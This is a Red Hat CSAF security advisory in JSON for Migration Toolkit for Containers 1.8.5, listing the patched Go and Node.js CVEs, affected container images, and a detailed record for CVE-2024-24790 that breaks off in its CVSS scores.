{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "The Migration Toolkit for Containers (MTC) 1.8.5 is now available.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n\n* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)\n\n* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n\n* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10906", url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "MIG-1458", url: "https://issues.redhat.com/browse/MIG-1458", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10906.json", }, ], title: "Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update", tracking: { current_release_date: "2024-12-18T04:37:04+00:00", generator: { date: "2024-12-18T04:37:04+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:10906", initial_release_date: "2024-12-10T01:37:19+00:00", revision_history: [ { date: "2024-12-10T01:37:19+00:00", number: "1", summary: "Initial version", }, { date: "2024-12-10T01:37:19+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:37:04+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-RHMTC-1.8", product: { name: "8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8", product_identification_helper: { cpe: "cpe:/a:redhat:rhmt:1.8::el8", }, }, }, ], category: "product_family", name: "Red Hat Migration Toolkit", }, { branches: [ { category: "product_version", name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_id: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-controller-rhel8&tag=v1.8.5-11", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_id: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-hook-runner-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_id: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-log-reader-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_id: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-must-gather-rhel8&tag=v1.8.5-9", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_id: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-openvpn-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_id: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rhel8-operator&tag=v1.8.5-10", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_id: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-operator-bundle&tag=v1.8.5-16", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_id: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-registry-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_id: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rsync-transfer-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_id: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-ui-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_id: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8&tag=v1.8.5-6", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", }, product_reference: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", }, product_reference: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", }, product_reference: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", }, product_reference: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", }, product_reference: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", }, product_reference: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", }, product_reference: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", }, product_reference: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", }, product_reference: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", }, product_reference: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", }, product_reference: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, ], }, vulnerabilities: [ { cve: "CVE-2024-24790", cwe: { id: "CWE-115", name: "Misinterpretation of Input", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292787", }, ], notes: [ { category: "description", text: "A flaw was found in the Go language standard library net/netip. The method Is*() (IsPrivate(), IsPublic(), etc) doesn't behave properly when working with IPv6 mapped to IPv4 addresses. The unexpected behavior can lead to integrity and confidentiality issues, specifically when these methods are used to control access to resources or data.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", title: "Vulnerability summary", }, { category: "other", text: "This CVE has been marked as moderate as for our products a network-based attack vector is simply impossible when it comes to golang code,apart from that as per CVE flaw analysis reported by golang, this only affects integrity and confidentiality and has no effect on availability, hence CVSS has been marked as such.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24790", }, { category: "external", summary: "RHBZ#2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24790", url: "https://www.cve.org/CVERecord?id=CVE-2024-24790", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 6.7, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", 